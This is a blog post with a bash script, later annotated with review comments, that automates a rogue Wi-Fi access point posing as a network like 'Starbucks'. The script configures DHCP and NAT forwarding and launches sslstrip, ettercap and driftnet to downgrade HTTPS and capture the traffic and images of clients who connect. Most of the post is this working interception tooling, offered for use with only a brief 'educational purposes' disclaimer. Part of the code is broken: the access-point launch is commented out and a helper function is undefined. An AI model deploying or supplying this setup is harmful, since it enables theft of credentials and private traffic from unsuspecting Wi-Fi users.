Fake-Access Point – Automation
I’ve been playing with creating fake access points (rogue access points) in my lab for quite some time now, and setting one up by hand was always cumbersome. Below is a .sh script that will do the magic for you (with a little tweaking). *Note: this has only been tested on a BackTrack distro. You can get pretty creative with this script by editing the airbase switches and almost turning this into a Jasager – (answering yes to all nearby probe requests ~insert evil laugh WOOHAHA~). *Note: this is for educational purposes; in other words, don’t be a jerk with this script. – sorry for the spacing issues
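#!/bin/bash
# PWN'in Time
#
# NOTE(review): the listing calls `intro` in several places but never defines
# it (presumably a banner helper - not visible here). The `function setup {`
# opener was also missing although `setup` is called in the execution section
# and the closing brace was present; the opener is restored below.

#######################################
# Optionally install dhcp3-server and write the lab DHCP configuration.
# Globals:   DHCP (written) - the operator's y/n answer
# Outputs:   progress on stdout, failures on stderr
# Returns:   1 if the install, the backup or the config write fails;
#            otherwise the status of the final `clear`
#######################################
function setup {
  intro
  echo "Is dhcp3-server already configured [y/n]?"
  read -r DHCP
  if [ "$DHCP" = "y" ]; then
    echo ""
  elif [ "$DHCP" = "n" ]; then
    echo "[>] Installing [please wait]..."
    # Output is still discarded, but a failed install no longer falls through
    # to overwriting the configuration of a package that is not there.
    if ! apt-get install dhcp3-server -y &>/dev/null; then
      echo "[!] apt-get install dhcp3-server failed" >&2
      return 1
    fi
    echo "[>] Installation finished"
    echo "[>] Backing up dchpd.conf to /etc/dhcp3/dhcpd.conf.backup"
    # Keep the first backup: on a second run the live file is this script's
    # own config, and moving it over the backup would lose the original.
    if [ ! -e /etc/dhcp3/dhcpd.conf.backup ] && [ -e /etc/dhcp3/dhcpd.conf ]; then
      if ! mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup; then
        echo "[!] could not back up /etc/dhcp3/dhcpd.conf" >&2
        return 1
      fi
    fi
    echo "[>] Seting up configuration file"
    # A /25 lab subnet: gateway .129 (assigned to at0 in `dhcp`), leases
    # .130-.140, DNS handed to clients is 8.8.8.8.
    cat > /etc/dhcp3/dhcpd.conf <<'EOF' || return 1
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers 8.8.8.8;
range 192.168.2.130 192.168.2.140;
}
EOF
    echo "[>] Finished dhcp setup"
    read -r -p "Press [Enter] key to continue..."
  else
    # Any other answer is reported once; the prompt is not repeated.
    echo "Please select y or n"
  fi
  clear
}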
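#######################################
# Ask the operator for the lab settings and echo them back.
# Globals:   FAKEAP, REALAP, SSID, CHANNEL (all written). FAKEAP is read by
#            `bypass` and REALAP by `iptables`; SSID and CHANNEL are only
#            used by the commented-out airbase-ng line and the summary here.
# Outputs:   prompts and the summary on stdout
# Returns:   status of the final `clear`
# Notes:     the prompts are quoted because `[ex.wlan2]:`, `[ex.Starbucks]:`
#            and `[1-12]?` are glob patterns; unquoted, a matching file name
#            in the current directory would be printed in their place.
#            `read -r` keeps backslashes in the answers literal.
#            The answers are not validated, and "Confirm Configuration?"
#            offers no way to decline - Enter simply continues.
#######################################
function startap {
  # interface
  clear
  intro
  echo "What is your Fake AP interface [ex.wlan2]:"
  read -r FAKEAP
  clear

  # connected interface
  intro
  echo "What is your interface that is connected to the Internet? [ex:wlan0 or Eth0]:"
  read -r REALAP
  clear

  # ssid
  intro
  echo "SSID of your fake AP [ex.Starbucks]:"
  read -r SSID
  clear

  # channel
  intro
  echo "Channel of your fake AP [1-12]?"
  read -r CHANNEL

  # checking
  clear
  intro
  echo "Confirm Configuration?"
  echo "Fake AP interface: $FAKEAP"
  echo "Connected infterface: $REALAP"
  echo "SSID: $SSID"
  echo "Channel: $CHANNEL"
  echo
  read -r -p "Press [Enter] key to continue..."
  clear
}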
# bypass: put the chosen wireless interface into monitor mode, randomise the
# MAC of mon0, and open xterm windows running sslstrip, ettercap and driftnet.
# Globals: FAKEAP (read). SSID and CHANNEL appear only in a commented-out line.
# NOTE(review): $FAKEAP is expanded unquoted and comes straight from `read`
# in startap; an empty or space-containing answer changes the command line.
# NOTE(review): nothing here checks that any tool started; airmon-ng output is
# discarded and every status message is printed unconditionally.
function bypass {
#interface up
intro
# The message says "up", but the command below takes the interface down.
echo "[>] Putting interface up"
ifconfig $FAKEAP down
#macchanger -r $FAKEAP
#ifconfig $FAKEAP up
#monitor mode
echo "[>] Putting your interface in monitor mode"
airmon-ng start $FAKEAP &>/dev/null
# mon0 is hard-coded - presumably the monitor interface airmon-ng creates;
# the script never confirms the name.
ifconfig mon0 down
echo "[>] Spoofing Mac Address"
# -r assigns a random MAC, so the lab AP's BSSID differs on every run.
macchanger -r mon0
ifconfig mon0 up
#create ap
echo "[>] Creating new window for creating access point"
# The airbase-ng launch is commented out in this listing, yet "Fake AP created"
# is still printed. at0, used below and in `dhcp`/`iptables`, is presumably the
# interface airbase-ng would provide - nothing visible here creates it.
#gnome-terminal --title="airbase-ng" -x airbase-ng -e $SSID -c $CHANNEL mon0 &
echo "[*] Fake AP created"
sleep 2
# Runs sslstrip.py from /pentest/web/sslstrip/ in a background xterm.
# Defender note: HTTPS stripping depends on the client's first request going
# out over plain HTTP; HSTS (ideally preloaded) closes that gap.
xterm -e "cd /pentest/web/sslstrip/;./sslstrip.py -a -k -f -l" &
echo "[*] SSLSTRIP RUNNING"
sleep 2
echo "[>] Creating new window for EtterCap"
#Change to RealAP or FakeAP?
# ettercap (text mode, quiet) and driftnet both listen on at0, i.e. on traffic
# from clients that joined the lab AP. The xterm PIDs are not recorded, and
# `finished` does not close these windows.
xterm -e "ettercap -T -q -p -i at0 // //" &
xterm -e "driftnet -v -i at0" &
}
# dhcp: give at0 the gateway address of the lab subnet and start the DHCP
# server on it.
# The addresses match the config written by setup: 192.168.2.129 is the
# `option routers` value and 255.255.255.128 (/25) is the subnet mask.
# Every command is chained with &&, so the first failure skips everything
# after it - including the final echo - and, because dhcpd3 and the init
# script have their output sent to /dev/null, the reason is not shown.
# The function's exit status is that of the first failing command.
# NOTE(review): dhcpd3 is started directly and then again through the init
# script - confirm both are intended.
# The last message only announces the firewall step; the rules themselves are
# applied by the separate `iptables` function.
function dhcp {
echo "[>] Setting up dhcp-server"
ifconfig at0 up &&
ifconfig at0 192.168.2.129 netmask 255.255.255.128 &&
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129 &&
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 &>/dev/null &&
/etc/init.d/dhcp3-server start &>/dev/null &&
echo "[>] Setting up /sbin/iptables"
}
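#######################################
# Replace the host's firewall rules with a NAT setup that forwards traffic
# arriving on at0 out through the Internet-facing interface.
# Globals:   REALAP (read) - the Internet-facing interface from startap
# Returns:   1 without touching any rule if REALAP is empty; otherwise the
#            status of the first failing command in the chain
# Notes:     this flushes ALL existing filter and nat rules and deletes the
#            user-defined chains on the machine, then enables IPv4
#            forwarding. `finished` restores none of it, so the lab host is
#            left with an empty ruleset and forwarding on after the script
#            exits.
#            The function shadows the `iptables` command name; the body uses
#            the absolute /sbin/iptables path, so it does not call itself.
#######################################
function iptables {
  # Check before the flush: with an empty value the MASQUERADE rule would
  # fail only after the existing rules had already been removed.
  if [ -z "${REALAP:-}" ]; then
    echo "[!] REALAP is not set; leaving firewall rules untouched" >&2
    return 1
  fi

  /sbin/iptables --flush &&
    /sbin/iptables --table nat --flush &&
    /sbin/iptables --delete-chain &&
    /sbin/iptables --table nat --delete-chain &&
    /sbin/iptables --table nat --append POSTROUTING --out-interface "$REALAP" -j MASQUERADE &&
    /sbin/iptables --append FORWARD --in-interface at0 -j ACCEPT &&
    echo 1 > /proc/sys/net/ipv4/ip_forward
}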
# finished: tear down the lab AP and exit the script.
# Stops monitor mode on mon0, kills any airbase-ng process, stops the
# dhcp3-server service, then exits with the status of the last command.
# NOTE(review): teardown is partial. The xterm windows opened in `bypass` are
# left running, the firewall flush, NAT rules and ip_forward=1 applied by
# `iptables` are not reverted, and /etc/dhcp3/dhcpd.conf.backup is not
# restored. Only airmon-ng's output is silenced; the other commands print
# their own errors.
function finished {
echo "[>] Kill EvilAP"
echo "[>] Turning off monitor mode..."
airmon-ng stop mon0 &>/dev/null
echo "[>] Shutting down airbase-ng"
killall airbase-ng
echo "[>] Stoping dchp server"
/etc/init.d/dhcp3-server stop
echo "[*] Ninja Vanish"
exit
}
# Entry point: run the stages in the order the page lists them, wait for
# Enter, then tear down.
# No stage's exit status is checked, so a failure in one stage does not stop
# the ones after it.
main() {
  setup
  startap
  bypass
  sleep 2
  dhcp
  iptables
  read -p "Press [Enter] key to quit..."
  finished
}

main